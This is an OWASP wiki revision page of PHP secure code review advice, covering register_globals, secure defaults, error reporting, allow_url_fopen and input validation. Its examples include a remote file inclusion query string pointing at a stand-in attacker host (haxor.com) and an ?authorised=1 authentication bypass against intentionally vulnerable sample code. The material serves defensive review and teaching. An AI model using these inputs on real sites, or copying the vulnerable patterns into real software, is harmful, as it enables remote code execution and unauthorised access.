Difference between revisions of "PHP Security Leading Practice"

From OWASP
Jump to: navigation, search
(Files in the documet root)
m (Added navigation to facilitate sequential reading online)
 
(14 intermediate revisions by 3 users not shown)
Line 1: Line 1:
===Global Variables===
+
{{LinkBar
 +
  | useprev=PrevLink | prev=Classic ASP Design Mistakes | lblprev=
 +
  | usemain=MainLink | main=OWASP Code Review Guide Table of Contents | lblmain=Table of Contents
 +
  | usenext=NextLink | next=Strings and Integers | lblnext=
 +
}}
 +
__TOC__
  
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0
+
===Global Variables===
 +
One does not need to explicitly create "global variables." This is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0  
  
Include directives in PHP can be vulnerable if register_globals is enabled.
+
Include directives in PHP can be vulnerable if register_globals is enabled.  
  
 
  <?PHP
 
  <?PHP
Line 11: Line 17:
 
  ?>
 
  ?>
  
With register_globals enabled the $dir variable can be passed in via the query string:
+
With register_globals enabled the $dir variable can be passed in via the query string:  
 
    
 
    
 
  ?dir=http://www.haxor.com/gimmeeverything.php
 
  ?dir=http://www.haxor.com/gimmeeverything.php
 
   
 
   
This would result in the $dir being set to:
+
This would result in the $dir being set to:  
 +
 
 
  <?PHP
 
  <?PHP
 
   
 
   
Line 22: Line 29:
 
  ?>
 
  ?>
  
Appending global variables to the URL may be a way to circumvent authentication:
+
Appending global variables to the URL may be a way to circumvent authentication:  
 
   
 
   
 
  <?PHP
 
  <?PHP
Line 37: Line 44:
 
  ?>
 
  ?>
  
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed.
+
If this page was requested with register_globals enabled, using the following parameter ?authorised=1 in the query string the athentication function assumes the user is authorised to proceed. Without register_globals enabled, the variable $authorised would not be affected by the $authorised=1 parameter.
Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.
+
  
 
=== Initialization===
 
=== Initialization===
When reviwewing PHP code make sure you can see the initialization value is in a "secure default" state.  
+
When reviewing PHP code, make sure you can see the initialization value is in a "secure default" state.  
 +
 
 
For example $authorised = false;
 
For example $authorised = false;
  
 
===Error handling===
 
===Error handling===
 
If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.
 
If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.
It is prudent to examine if '''E_ALL''' is enabled, this ensures all errors and warnings are reproted.
+
It is prudent to examine if '''E_ALL''' is enabled, this ensures all errors and warnings are reported.
 
'''display_errors''' should be set to '''off''' in production
 
'''display_errors''' should be set to '''off''' in production
  
 
===File Manipulation===
 
===File Manipulation===
  
'''allow_url_fopen''' enabled by default in PHP.ini This allows URL's to be treated like local files.  
+
'''allow_url_fopen''' is enabled by default in PHP.ini This allows URLs to be treated like local files.  
URL's with malicious scripting may be included and treated like a local file.
+
URLs with malicious scripting may be included and treated like a local file.
  
 
====Files in the document root====
 
====Files in the document root====
At times one must have include files in the document root and these *.inc files are not to be accessed directly. If this is the case and during the review you find such files in the root then examine httpd.conf to see if anything such as
+
At times one must have include files in the document root, and these *.inc files are not to be accessed directly. If this is the case, and during the review you find such files in the root, then examine httpd.conf. For example:
  
 
  <Files"\.inc">
 
  <Files"\.inc">
Line 63: Line 70:
  
 
===HTTP request Handling===
 
===HTTP request Handling===
The Dispatch method is used as a "funnel" wherein all requests are passed through it. One does not access other PHP files directly but rather via the dispatch.php. This could be akin to a global input validation class wherein all traffic passes.
+
The Dispatch method is used as a "funnel" wherein all requests are passed through it. One does not access other PHP files directly, but rather via the dispatch.php. This could be akin to a global input validation class wherein all traffic passes.  
  
 
  http://www.example.com/dispatch.php?fid=dostuff
 
  http://www.example.com/dispatch.php?fid=dostuff
  
Relating to security it is leading practice to implement validation at the top of this file.
+
Relating to security, it is leading practice to implement validation at the top of this file. All other modules required can be '''include''' or '''require''' and in a different directory.  
All other modules required can be '''include''' or '''require''' and in a different directory.  
+
  
'''Including a method''': If a dispatch.php method is not being used look for includes at the top of each php file.
+
'''Including a method'''
The '''include''' method may set a state such that the request can proceed.
+
  
It may be an idea to check out PHP.ini and look for the '''auto_prepend_file''' directive. This may reference an automatic include for all files.  
+
If a dispatch.php method is not being used, look for includes at the top of each php file. The '''include''' method may set a state such that the request can proceed.
 +
 
 +
It may be a good idea to check out PHP.ini and look for the '''auto_prepend_file''' directive. This may reference an automatic include for all files.
  
 
===Positive input validation===
 
===Positive input validation===
Line 80: Line 87:
 
nl2br(): Converts new line characters to HTML break "br"  
 
nl2br(): Converts new line characters to HTML break "br"  
 
htmlspecialchars():Convert special characters to HTML entities
 
htmlspecialchars():Convert special characters to HTML entities
 +
 +
{{LinkBar
 +
  | useprev=PrevLink | prev=Classic ASP Design Mistakes | lblprev=
 +
  | usemain=MainLink | main=OWASP Code Review Guide Table of Contents | lblmain=Table of Contents
 +
  | usenext=NextLink | next=Strings and Integers | lblnext=
 +
}}
 +
 +
[[Category:OWASP Code Review Project]]

Latest revision as of 11:48, 9 September 2010

«««« Main
(Table of Contents)
»»»»

Contents


Global Variables

One does not need to explicitly create "global variables." This is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0

Include directives in PHP can be vulnerable if register_globals is enabled.

<?PHP

include "$dir/script/dostuff.php";
 
?>

With register_globals enabled the $dir variable can be passed in via the query string:

?dir=http://www.haxor.com/gimmeeverything.php

This would result in the $dir being set to:

<?PHP

include "http://www.haxor.com/gimmeeverything.php";

?>

Appending global variables to the URL may be a way to circumvent authentication:

<?PHP
if(authenticated_user())
{
 $authorised=true;
}

if($authorised)
{
 give_family_jewels()
}

?>

If this page was requested with register_globals enabled, using the following parameter ?authorised=1 in the query string the athentication function assumes the user is authorised to proceed. Without register_globals enabled, the variable $authorised would not be affected by the $authorised=1 parameter.

Initialization

When reviewing PHP code, make sure you can see the initialization value is in a "secure default" state.

For example $authorised = false;

Error handling

If possible check if one has turned off error reporting via php.ini and if "error_reporting" off. It is prudent to examine if E_ALL is enabled, this ensures all errors and warnings are reported. display_errors should be set to off in production

File Manipulation

allow_url_fopen is enabled by default in PHP.ini This allows URLs to be treated like local files. URLs with malicious scripting may be included and treated like a local file.

Files in the document root

At times one must have include files in the document root, and these *.inc files are not to be accessed directly. If this is the case, and during the review you find such files in the root, then examine httpd.conf. For example:

<Files"\.inc">
   Order allow, deny
   deny from all
</Files>

HTTP request Handling

The Dispatch method is used as a "funnel" wherein all requests are passed through it. One does not access other PHP files directly, but rather via the dispatch.php. This could be akin to a global input validation class wherein all traffic passes.

http://www.example.com/dispatch.php?fid=dostuff

Relating to security, it is leading practice to implement validation at the top of this file. All other modules required can be include or require and in a different directory.

Including a method

If a dispatch.php method is not being used, look for includes at the top of each php file. The include method may set a state such that the request can proceed.

It may be a good idea to check out PHP.ini and look for the auto_prepend_file directive. This may reference an automatic include for all files.

Positive input validation

Input validation: strip_tags(): Removes any HTML from a String nl2br(): Converts new line characters to HTML break "br" htmlspecialchars():Convert special characters to HTML entities


«««« Main
(Table of Contents)
»»»»